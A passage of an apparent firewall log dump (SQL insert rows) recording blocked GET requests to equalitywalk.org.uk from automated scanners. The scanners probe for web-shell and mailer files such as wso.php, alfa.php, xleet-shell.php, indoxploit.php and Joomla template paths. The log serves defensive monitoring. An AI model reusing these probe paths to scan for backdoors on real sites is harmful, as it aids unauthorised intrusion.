Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','JbQAZhkNe9cEtPwfOrovD246',0,1674673829.5442,99,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','2A3V1DHSO0hP7cv98kQCadtp',0,1674673831.6608,142,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','sMeuIbCSR71dkyJfcO6v0BF9',0,1674673833.8275,127,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Zqlk49IHAVDfdGe0MuyEv6rR',0,1674673835.9096,125,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','6va9EsRI3yoYX1uAhP4WpOnt',0,1674673838.0321,95,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','FQX2dkm801WryaKZuhft6IYs',0,1674673840.1012,134,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','omNB5vajP4dCQLUI0c6tJZAO',0,1674673842.2188,122,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/LEAF.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','F3WZ0GpwslYQk5ijIS1EV8oz',0,1674673844.3074,140,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','6zN8CGT2Sn9BhdLRma1tQ0oX',0,1674673846.3790,93,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','1Nbv0FPrRHI6OSxUXJyC4lgz',0,1674673848.6528,135,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','2Zeul3DhNkMzTwAjqPmosLYJ',0,1674673850.7524,139,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/Leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','4rEdXYTeLMx6Z0uiBGRQt8ko',0,1674673852.8553,118,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','KA8HjLUJpg2bwx51aODuTeSz',0,1674673854.9338,132,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','nBWJUtiAGHcIove5jMz96Y2w',0,1674673857.1002,96,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','p5WOAETcGUyHMKmot4eQdPIS',0,1674673859.1647,111,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','JpSKOkjBbm0oHq9IChrPsAwv',0,1674673861.2628,99,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Rq7Nsx40AZTUboMaDLcpYfSX',0,1674673863.3547,95,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','6o9YOvJQ5yuh13x0bUsle2Vr',0,1674673865.4066,102,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','1CyZwipl0vzhVRrG7JD6bSNP',0,1674673867.4548,101,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','OXedYsr10mE6xaD3kpHQWyGS',0,1674673869.6461,99,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','EN7paOqg8U6eGzuoHf5dnSZY',0,1674673871.6686,118,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','b1rsza3jvwUuxcQyn49lehFV',0,1674673873.7474,101,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/gaza.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','NvnReQDW8T4uXgbdfxCm9zh7',0,1674673875.8199,115,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','fKHWIqUmpcnGEetB49zZrhLJ',0,1674673877.9055,93,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','geLIc2nmMNOjd1tbKJGH30yY',0,1674673879.9499,99,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','taMe8uJK6dWvEsgRowQNV4jb',0,1674673882.0201,103,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','opfXNWdwCqZDHujist9SnF2m',0,1674673884.0703,125,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','3rIhHlETBMS8qFYv1ZmCw57L',0,1674673886.1202,225,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','lao2wXCH6QiUfRWPty3bYgAM',0,1674673888.3206,103,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.equalitywalk.org.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Isqc2oJMkNjVnb736aOvFh1e',0,1674673890.3772,131,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://www.equalitywalk.org.uk/wso112233.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','dGwjv8ipDQ6RxHyuWXAztMbB',0,1674690108.4810,135,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://www.equalitywalk.org.uk/bala.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','jmlEWPMIQbuzn2pvDk95fR0F',0,1674690116.3662,122,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','5ABPzHUv09cXgG4VO3E6Td2W',0,1674690130.8822,114,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://www.equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nVxBoMUOClXkjf6RciShy2HJ',0,1674690134.5941,166,'','GET',403,0,700,0,1,'',0),('212.227.176.155',3571691675,'','https://www.equalitywalk.org.uk/wp-admin/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Rrbi3Gnjflm4skZ59qPeVNWJ',0,1674690137.6792,152,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.26.0\"}','h3UwjlN908SBP6cQgZx5JIzC',0,1674715047.4130,244,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"python-requests\\/2.26.0\"}','VaPxrGKXIth3SOd7H2qbl6iL',0,1674715050.1257,144,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/shells.php','','{\"1\":\"python-requests\\/2.26.0\"}','5p9AIBSR0yJ42YPhsdaltXum',0,1674715050.7959,97,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"python-requests\\/2.26.0\"}','BzQiCyTNK85xw9tjlZfGAROn',0,1674715052.3701,110,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-admin/alfa.php','','{\"1\":\"python-requests\\/2.26.0\"}','ejGSWAuaHXOkqEZ7f5hUNJwI',0,1674715053.9809,167,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"python-requests\\/2.26.0\"}','ok7pfsaYZtlq5hDNVMA3wubr',0,1674715054.6990,110,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-includes/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','gynY3qQsdxt16olfRaV085XE',0,1674715055.8661,97,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-admin/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','fGXbICxnDVrAo1PwBm8d3Rz7',0,1674715057.7825,133,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-includes/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','v6lDmA8MgJtn1dNXfwxBbGOK',0,1674715060.3461,147,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-admin/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','cINGz8kTLiQ0mgBVS6FJApER',0,1674715061.6968,98,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-22.php','','{\"1\":\"python-requests\\/2.26.0\"}','y4GbcXxWFhYowdBK3sR0fvHU',0,1674715062.2515,119,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"python-requests\\/2.26.0\"}','60O8czSJxTKsftjL2briyk1U',0,1674715062.8062,115,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','cSnHL6ElG9hXiTdOWm4IfCB0',0,1674715063.3517,137,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.26.0\"}','JBTxYLDKZd2uWzMq4oGXi6kg',0,1674715063.9353,95,'','GET',403,0,700,0,1,'',0),('109.248.175.137',1845014409,'','https://www.equalitywalk.org.uk/bala.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','Ftm2Y3nDiBuoHxsPa7TNCJzl',0,1674720800.7802,100,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','4LWrfBysGMOiZCk36d2cjXKh',0,1674721235.1375,209,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','7ezpCZU9cGklb5wduigHS0sN',0,1674721259.3907,98,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','QO4wxFpXnfrs1NWdjlBECqoL',0,1674721268.9542,113,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','zh8EvXSRNZqia0YQnl1VsUCo',0,1674721269.7438,98,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','rT4OAU6MsuQoLm0iCaKHY8Jv',0,1674721273.5804,101,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','3WSIozQ84OLXxvfqRPdNceiK',0,1674721277.3591,95,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','rQHgIu0sPnVXxLt9KkWJh7w1',0,1674721279.0179,92,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','Id9EbJBFXSqeD50l4hYcpHTN',0,1674721285.1168,108,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','EH30QFUchNuM1zVT4XnWi8Gg',0,1674721286.4083,116,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','8pVCOKyFSEvUgAbkrDdGcaX7',0,1674721287.9488,99,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','NQgxjkZdJFzEy5A7vqhLReuM',0,1674721292.0873,111,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','hR8dFTaZcn2tPHl9LmbBKg1j',0,1674721295.8421,125,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','iPxspLdRkncF4UZq50EoStmQ',0,1674721297.4677,96,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','gpAlrLq9BP1Xf4m7eot3nEbj',0,1674721298.6476,101,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','EW3vxtCujKGikOf7gs4lUTab',0,1674721304.5036,106,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','VMLbd7ZzjSO6C0Qh43IHJNgR',0,1674721305.8569,102,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php','','{\"1\":\"python-requests\\/2.27.1\"}','JuwngZirvmaMRtVb3sjQKYIA',0,1674721306.9144,136,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"python-requests\\/2.27.1\"}','NJyxFauS2gd9qmG8rTWDsHeI',0,1674721313.3757,102,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/libraries/joomla/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','cNHLoD7gwYZTe68pI4KCrUv5',0,1674721314.5033,132,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/libraries/joomla/jmails.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','HnW5mjJrqhf2STPc7bDioGwa',0,1674721315.8585,160,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/libraries/joomla/jmail.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','Y2FHTL8ly5i3mkq1U7vMAuN9',0,1674721316.6612,97,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','R8FqKYPTfkXplmiIwMdbQZjS',0,1674721318.1497,119,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','6qiHloJkXTuOjM2CEY5GW7Nc',0,1674721319.7255,107,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/XxX.php','','{\"1\":\"python-requests\\/2.27.1\"}','ZTmeJrGNDtkOBiLwl4WFCHa9',0,1674721321.2545,87,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/Marvins.php','','{\"1\":\"python-requests\\/2.27.1\"}','SsnCa9J3ExF1ZbwV5uDM8lhj',0,1674721322.0029,132,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/rxr.php?rxr','','{\"1\":\"python-requests\\/2.27.1\"}','ui4EbMxLQrqlOVDNs2HmgURG',0,1674721323.1723,216,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','w1kXzHBv6eyVI0CYg5KcNFmb',0,1674721324.1345,108,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','adRtevPi8CcW0xqQupsfFVoz',0,1674721325.9230,89,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','qnzv7F9msiXT8yBrS43Pbhpu',0,1674721327.2145,93,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/RxR.php','','{\"1\":\"python-requests\\/2.27.1\"}','4wbuetXBQ56cdPZvNGpjSCDI',0,1674721328.7093,112,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"python-requests\\/2.27.1\"}','viClj8cRuYMUNwtKgkoP4QFz',0,1674721330.1913,115,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/V3.php','','{\"1\":\"python-requests\\/2.27.1\"}','GHzeVJADf6Nck5rmbUq2BSda',0,1674721330.9660,133,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','6JfzRt2hvF8MiIEV3ndLZmaq',0,1674721332.0725,97,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','EGAImxBUwTkM1Q65nCd2q0up',0,1674721344.5443,319,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','XVzD5GUrNI41JHFRnp9g7Lws',0,1674721345.9736,109,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','820uBQviFTjSOMKdZ9fnI1pg',0,1674721347.0112,94,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/administrator/templates/bluestork/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','gVjxqU1P4yMa0NTmh8nSDvw2',0,1674721347.7456,98,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/administrator/templates/bluestork/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','LvEJr5SVdyoqgBYejf1WHa4b',0,1674721349.2537,94,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/administrator/templates/hathor/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','bQPEMu7SOlAoqRnciF0IdzgC',0,1674721350.8293,93,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/administrator/templates/hathor/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','Ni0AUd8ycQz65tYRZKeCgFlp',0,1674721351.6665,146,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/administrator/templates/isis/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','0ZmlNrpskcVHd6qx9vJCB2D1',0,1674721354.0543,88,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/administrator/templates/isis/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','4IqvB8ozlMJjuFWK1QfXtTRG',0,1674721355.2904,114,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/beez/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','ukNrqWg6clEvsnj93dyTMmBf',0,1674721357.6633,99,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/ja_purity/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','DWwgS4BmpQEOJNTtXG7Mc1Pf',0,1674721359.8252,101,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','JAUY64821sjykvIw5tHxGRlg',0,1674721361.9905,95,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/system/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','VBnYQWMZrNHbwoymRKXODigU',0,1674721366.1127,108,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/system/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','eT2CtsB9RlL8ny1VxfAJOD4a',0,1674721367.7842,137,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/beez3/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','NKWUlT4hVJq1Pv6Am2nRieX5',0,1674721369.2364,110,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/beez3/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','pKQdrlxmVsPLeTCcUJD38ybk',0,1674721370.5718,117,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/beez5/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','PxaqSiF5uLeC29tEpThRIyfk',0,1674721371.6945,94,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/beez5/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','zKrlDAGqi1EVP7ZkC43vywhQ',0,1674721373.1599,96,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/beez_20/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','IzodMU37jhgrNH1tKRLPynSx',0,1674721374.0637,84,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/beez_20/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','lYiFAPwyrj62nUasfGSgJZuo',0,1674721376.7997,125,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/protostar/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','WbO8odHZY5wfzeiMB7DFvchE',0,1674721377.5685,99,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/protostar/